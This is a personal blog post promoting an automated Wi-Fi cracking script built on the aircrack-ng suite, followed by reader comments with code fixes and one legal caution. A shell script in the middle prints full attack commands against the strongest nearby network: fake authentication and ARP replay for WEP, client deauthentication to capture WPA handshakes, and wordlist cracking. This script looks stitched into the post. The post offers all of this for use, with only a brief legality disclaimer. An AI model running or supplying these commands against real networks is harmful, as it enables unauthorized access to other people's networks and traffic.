My Wireless Cracking Tool

I’ve become a semi-expert on wireless networking, its security features, and how to get around them. Before I continue I want to emphasize:

The act of cracking encryption is not illegal, just like picking a lock is not illegal. It is the unauthorized access of that network which is illegal, just like breaking and entering is illegal.

So, to sum it up, there are two kinds of encryption you will run into: the weak kind (WEP) and the strong kind (WPA, which on home networks means WPA/WPA2 with a pre-shared key). WEP can be broken in about 5-10 minutes: you collect enough encrypted packets (ARP replay injection speeds that up) and the key is recovered statistically from them. WPA can be broken in about 24 hours of wordlist cracking, but only if their password is in your password try-out list, because all you get off the air is the four-way handshake and the rest is an offline guessing game.

The actual process of breaking into a network like this uses a suite of tools called the aircrack-ng suite. You can read their tutorials and such, and I highly recommend you do if you want to get into this sort of thing. It’s a lot of FUN! Be prepared to learn Linux while you are at it….

But once you understand what you are doing, you will appreciate the tool I have written. It automates the process of getting the keys. I wrote it as a “set-it-and-forget-it” tool that I could just leave running. It isn’t too clean, but if you can read bash scripting you can figure it out.

Here is a screenshot of my tool cracking WEP

Remember! Don’t try to just run this tool without understanding what it does and how to read it. If you haven’t broken a WEP key manually, you don’t want to run this. It does WEP and WPA cracking (for WPA it saves the captured handshake so the dictionary attack can run later). Good luck! I will provide minimal support via comments on this post. Don’t forget to put your radio in monitor mode first, and if you are going to do WPA you need the mdk3 tool, which is used to deauthenticate clients so that they reconnect and you can capture the handshake.
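To make the two procedures above concrete, here is an added example (my own script, not superscanner.sh and not code from the aircrack-ng project) that does the two jobs the tool automates: it parses the CSV that airodump-ng writes (the temp-01.csv file the comments mention), ranks the access points by signal strength and privacy type, and then prints the aircrack-ng command lines for the strongest WEP target and the strongest WPA target. The CSV sample is constructed inline in airodump-ng's column layout so the script runs offline; the monitor interface name mon0, the attacker MAC, the capture prefix and the wordlist path are assumptions. Where the post's tool uses mdk3 for the deauthentication step, this example uses aireplay-ng's deauth mode for the same purpose, and it only prints the attack commands rather than running them.

```shell
#!/bin/sh
# Added example (not superscanner.sh): rank the APs in an airodump-ng CSV dump
# and print the aircrack-ng steps for the strongest WEP or WPA target.
# Assumptions: monitor interface mon0, our card's MAC, capture prefix, wordlist.

MON_IF="${MON_IF:-mon0}"
OUR_MAC="${OUR_MAC:-00:c0:ca:00:00:01}"                   # assumed: our own MAC (fake auth / ARP replay)
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"  # assumed path to the "password try-out list"
CAPTURE_PREFIX="${CAPTURE_PREFIX:-capture}"               # airodump-ng -w prefix -> capture-01.cap
TAB=$(printf '\t')

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an AP table, a blank line, then a station table.  Column 4 is the channel,
# 6 the privacy type, 9 the power in dBm, 11 the IV count, 14 the ESSID.
SAMPLE_CSV=$(cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-06-01 12:00:00, 2009-06-01 12:05:00,  6,  54, WEP, WEP, OPN, -60,  120,  3500,   0.  0.  0.  0,   7, linksys,
00:11:22:33:44:66, 2009-06-01 12:00:00, 2009-06-01 12:05:00, 11,  54, WPA2, CCMP, PSK, -48,   90,     0,   0.  0.  0.  0,   8, homewifi,
00:11:22:33:44:77, 2009-06-01 12:00:00, 2009-06-01 12:05:00,  1,  54, WEP, WEP, OPN, -85,   30,   120,   0.  0.  0.  0,   5, guest,
00:11:22:33:44:88, 2009-06-01 12:00:00, 2009-06-01 12:05:00,  6,  54, OPN, , , -70,   60,     0,   0.  0.  0.  0,   4, cafe,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
aa:bb:cc:dd:ee:01, 2009-06-01 12:01:00, 2009-06-01 12:05:00, -50,  400, 00:11:22:33:44:66, homewifi
EOF
)

# list_aps: read a dump on stdin, print one tab-separated line per AP
# (BSSID, channel, privacy, power, IV count, ESSID), strongest signal first.
list_aps() {
    awk -F',' 'BEGIN { OFS = "\t" }
        /^BSSID,/       { in_ap = 1; next }   # AP table header
        /^Station MAC,/ { in_ap = 0 }         # station table: stop collecting
        in_ap && NF >= 14 {
            for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)
            if ($1 != "") print $1, $4, $6, $9, $11, $14
        }' | sort -t "$TAB" -k4,4nr
}

# pick_target TYPE: strongest AP whose privacy column matches TYPE
# (WEP; WPA matches both WPA and WPA2; OPN).  Reads the dump on stdin.
pick_target() {
    list_aps | awk -F'\t' -v want="$1" '$3 ~ want { print; exit }'
}

# plan_attack BSSID CHANNEL PRIVACY ESSID: print (do not run) the aircrack-ng
# steps for this target.  The post's tool uses mdk3 for the WPA deauth;
# aireplay-ng -0 is used here for the same job.
plan_attack() {
    bssid=$1 chan=$2 priv=$3 essid=$4
    case $priv in
        WEP)
            cat <<EOF
# $essid: lock airodump-ng on the channel and write ${CAPTURE_PREFIX}-01.cap
airodump-ng -c $chan --bssid $bssid -w $CAPTURE_PREFIX $MON_IF &
# fake-authenticate so the AP accepts our frames, then replay ARP to mint new IVs
aireplay-ng -1 0 -a $bssid -h $OUR_MAC $MON_IF
aireplay-ng -3 -b $bssid -h $OUR_MAC $MON_IF &
# PTW needs tens of thousands of IVs; aircrack-ng re-reads the file as it grows
aircrack-ng -b $bssid ${CAPTURE_PREFIX}-01.cap
EOF
            ;;
        WPA*)
            cat <<EOF
# $essid: capture, then kick a client off so it reconnects and we get the 4-way handshake
airodump-ng -c $chan --bssid $bssid -w $CAPTURE_PREFIX $MON_IF &
aireplay-ng -0 5 -a $bssid $MON_IF
# offline dictionary attack on the saved handshake; succeeds only if the passphrase is in the list
aircrack-ng -w $WORDLIST -b $bssid ${CAPTURE_PREFIX}-01.cap
EOF
            ;;
        *)
            echo "# $essid ($bssid) is $priv: no key to crack"
            ;;
    esac
}

# demo: run the selection against the constructed sample and print both plans.
demo() {
    for want in WEP WPA; do
        line=$(printf '%s\n' "$SAMPLE_CSV" | pick_target "$want")
        [ -n "$line" ] || continue
        oldifs=$IFS; IFS=$TAB; set -- $line; IFS=$oldifs
        echo "## strongest $want network: $6 ($1) channel $2, $4 dBm, $5 IVs so far"
        plan_attack "$1" "$2" "$3" "$6"
    done
}

demo
```

With a real dump, feed `cat temp-01.csv` into pick_target instead of the sample. The WEP plan only finishes once the # IV column has climbed into the tens of thousands (the ARP replay is what gets it there on a quiet network), and the WPA plan only finishes if the passphrase is in the wordlist, which is exactly the limit the post puts on WPA cracking.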

Here is the download link to Kyle’s Wireless Cracking Tool.

Here is a link to a more updated version of my Cracking Tool.

17 Responses to “My Wireless Cracking Tool”


  1. Anonymous

    Hi,
    your tool has me baffled. I’ve used aircrack-ng before but am new to Linux/scripts, although I have run other aircrack scripts before. This is what I get in the terminal. Maybe I have to manually specify my injection interface, which is mon0… I’m not too sure. Any idea? Thanks.

    superscanner.sh: 57: source: not found
    rm: cannot remove `temp*': No such file or directory
    No interface specified.
    "airodump-ng --help" for help.
    kill: 57: No such process

  2. Kyle Anderson

    Hmm, if you want you can email or Twitter me and I’ll help you get it going. I’m not sure what is going wrong there; are you using bash? Are you using at least aircrack-ng 1.0?

  3. Anonymous

    Do you have updated code for Ubuntu 9.04 bash and the latest aircrack?

  4. Anonymous

    I find that you can simplify the process by removing the code 'source config' and replacing it with this code I have just written:

    # take the first five characters (e.g. wlan0) of every iwconfig line that mentions IEEE; the last one wins
    iwconfig|grep "IEEE"|cut -b 1,2,3,4,5 > temp
    for IEEE in `cat temp`; do WIFI=`echo $IEEE`; done
    rm temp
    # put that card into monitor mode; airmon-ng prints the new monitor interface
    airmon-ng start $WIFI > temp
    rm temp
    # find the interface now reported in Monitor mode (e.g. mon0) and use it as DEVICE
    iwconfig|grep "Monitor"|cut -b 1,2,3,4,5 > temp
    for tdevice in `cat temp`; do DEVICE=`echo $tdevice`; done
    rm temp

    Oh, and only by dissecting your script did I learn how to do that; so thank you for teaching me about 'grep' and 'cat', very useful.

  5. Anonymous

    My mistake, throw in this code:

    # write "export DEVICE=<monitor interface>" into the config file the script sources
    WIFI="export DEVICE="`echo $DEVICE`
    echo $WIFI > config

    just under my other additions. :)

  6. Kyle Anderson

    Awesome! Yeah man, I feel like I write cat-grep-sed everywhere. I like the config file because often I use 2 cards, one for hacking and one for surfing. Also maybe someday I’ll throw in more variables to allow easier tweaking for different environments.

    Also I’ve updated the page with a more recent version of the superscanner; it may be a little better.

  7. Anonymous

    Do you mind if I use this program in a live CD? I’d like to try and make something like the ophcrack live CD but cracking wifi instead of Windows logins…

  8. Kyle Anderson

    Feel free man, go to town!

  9. Anonymous

    I have noticed that the program 'superscanner.sh' keeps trying to open "temp-01.txt". For some reason my aircrack does not make that file, but it does make temp-01.csv. This causes an error that just sends the program into a loop. It’s a simple fix. Just change "temp-01.txt" to "temp-01.*" in the line
    cat temp-01.txt | strings | grep -B1000 Station | grep ":" | cut -f 1,4,5,6,8,14 -d "," | sort -k 4 > templist

  10. Kyle Anderson

    Yeah, aircrack’s behavior changed from .9 to 1.0, YMMV. Hey, this is kind of an inefficient way to communicate. You can email me at kyle@xkyle.com or Jabber IM at the same address.

  11. Anonymous

    In the files "Break.sh" and "are-there-any-near-me" I see references to a device called "ath0" instead of calling this device with the $DEVICE var. Just a note for those who run into this problem. Simple fix; just replace the word 'ath0' with the name of your card or '$DEVICE'.

  12. SmileyHill

    http://pastebin.com/m421e1bc4

    Here’s an interesting piece of code I wrote. With some code taken from your script I updated it. Let me know what you think. And if you want you can host it here on your site. What this code does is this: if you just run it, it will display a list of wifis around you and ask you to choose one. Once you have chosen, it will begin to crack it. Once done, it will write what it finds to your home dir and close down the program.

    If you already know the MAC, the channel and the ESSID of the wifi you want to get into, you can simply run it with the MAC, channel and ESSID after it, like this:

    ./programname 00:00:00:00:00 1 LiNKSYS

  13. SmileyHill

    I have been so caught up in the fixes and such that I forgot to mention something:

    Fantastic program! Thanks for taking the time to write it! :)

  14. Esquilax

    Kyle,

    Thanks very much for your effort making this. I just wanted to let you know that it seems to have a problem running on the slitaz aircrack-ng distro, both with spawning X sessions [*] and also the command "ip" used in break.sh to derive the adapter’s MAC doesn’t appear to exist in the version I’ve got (0.78) either.

    If you have any pointers about these I’d love to hear them as it’s not my area of expertise at all. Thanks again.

    [*] I get a message about being unable to access the display, the same message I get if I type "xterm" from the shell. The aircrack-ng MOTD specifically suggests using startx rather than xterm to open an X session, but I don’t know why this is; substituting startx for xterm in your script doesn’t seem to solve the problem.

  15. Vic Cabrera

    Hi Kyle, I’m having a problem downloading your tool. I am using Windows XP and Firefox’s FoxyProxy through my G1 phone. Please help.

  16. Sean Reifschneider

    Just because something is not illegal does not mean that you won’t be arrested for it. A random beat cop probably isn’t going to understand the distinction between passive wireless sniffing, actively connecting to a network, and whether the cracking should be prosecuted under the anti-circumvention measures of the DMCA.

    So, even if it’s legal you may still have to spend 5 to 6 figures on lawyers to defend your position in court. Take, for example, Randal Schwartz, who ended up without a felony record but only after spending a quarter million dollars.

    And be sure that once they have you and have confiscated all your computer gear, they will be looking very closely at all of your actions, for anything they can add onto your offense list. They can probably get you on one of those 3 felonies you commit every day (http://online.wsj.com/article/SB10001424052748704471504574438900830760842.html).

    Sean

  1. verizon makes it easy to use neighbor’s FIOS « Sagacious Himself — brevity in circumlocution – suffering genius
